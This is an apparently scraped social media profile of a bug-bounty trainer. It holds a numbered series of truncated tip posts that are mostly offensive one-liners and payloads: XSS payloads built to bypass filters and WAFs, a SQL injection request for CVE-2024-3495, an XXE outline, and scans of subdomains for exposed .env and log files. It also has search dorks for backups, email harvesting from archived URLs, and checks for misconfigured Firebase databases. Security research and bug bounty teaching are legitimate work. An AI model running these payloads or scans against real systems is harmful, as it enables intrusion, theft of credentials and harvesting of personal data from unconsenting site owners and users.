VAIDIK PANDYA
@h4x0r_fr34k
Escape the ordinary! Building: @tcb_securities 🔲 Explorer 🔲 CyberSecurity Enthusiast🔲 YouTuber Click here👇
somewhere
Joined December 2020
We conduct trainings and live sessions, and this is what our last batch shared 🔥 more.. : https://t.co/s2gotZAhFH
Post 16/30 : Quick SQLi OneLiner SQL Injection One-Liner waybackurls target[.]com | grep '=' | sort -u | nuclei -t ../fuzzing-templates/sqli -dast Working: This fetches all URLs with query parameters for the target domain using waybackurls, filters unique parameterized
Post 12/30 : XSS Payloads Payload 1 - Iframe Onload (Attribute Splitting & Obfuscation): Bypasses many script tag and naive filters Caught by: Advanced filter sets only <iframe/onload​='this["src"]="javas	cript​:al"+"ert``"';> Payload 2 - Img Onerror with JS Concatenation:
Post 11/30 : XSS Payloads You can check this payload Payload 1 - Direct Script: Basic file type checks Caught by: Most WAFs <svg xmlns=" https://t.co/VSoIBjzh4s"><​script>alert('XSS')<​/script></svg> Payload 2 - Event Handler: Bypasses: Script tag filters Caught by:
Had a blast leading a session with #BSidesAgra! 🚀on info gathering & bug bounty tips! Recordings & resources: https://t.co/YZcCPBdtna
Post 10/30 : Config.js FOFA Dork: host="<TARGET>" && body="config.js" (You can add more files like config.json, app.config.js, and more) Open the results and look for the file in the source code
Post 9/30 : XSS Exploitation : https://<TARGET>/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E Payload :
Post 8/30 : Log files and leaks 1. Gather a list of subdomains subfinder -d <target>.tld -o subdomains.txt 2. Then you can use this One-liner while read host; do echo "$host/app.log" echo "$host/error.log" echo "$host/access.log" echo "$host/debug.log" echo
Post 7/30 : .env 1. Gather a list of subdomains subfinder -d <target>.tld -o subdomains.txt 2. Then you can use this One-liner while read host; do echo "$host/.env"; done < subdomains.txt | httpx -mc 200 It will find the accessible .env file
Post 6/30 : CVE-2021-27931 - XXE 1. Find or bruteforce PageControllerXml.jsp 2. Send a crafted PAYLOAD request for a pingback Note: Always try to chain this pingback in more impactful ways; don't report it as it is. Payload and further details: https://t.co/bJn874fIr4
Post 5/30 : CVE-2024-3495 - SQLi 1. Find wp-admin.ajax 2. Find out nonce : curl "Target-url" | grep nonce 3. exploit and get version curl -sk ' https://<TARGET>/wp-admin/admin-ajax.php' \ -d "action=tc_csca_get_states" \ -d "nonce_ajax=VALID-NONCE" \ -d "cnt=1 OR 0 UNION SELECT
Post 4/30 : Misconfigured Firebase with read/write access systematically: 1. Get the Firebase URL: Find the database URL in app source code or network traffic, e.g., https://<project-id>.<firebaseio>[.]com/. 2. Check read access: Open your browser or use curl to check if you
Post 3/30 : Simple dorks Dork : site:*.com intitle:"index of" "Backup" OR "Website-Backup" OR "User record" This one is a simple dork; try adding more specific endpoints or files too (I will also drop some soon). This can be helpful
Post 2/30: Email Leaks from waybackurls cat waybackurls \ | grep -Eoi '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' \ | tr '[:upper:]' '[:lower:]' \ | grep -vE '\.(png|jpg|jpeg|svg|gif)$' \ | grep -vE
Post 1/30 : CVE-2025-29927 How to find vulnerable assets for it! Steps: 1. Get all domains and IPs Domains >> subfinder -dL list-of-domain.txt -o subdomains.txt IPs >> shodan search "ssl:'domain.tld'" --fields ip_str --limit 1000 >> ips.txt 2. Find their open ports using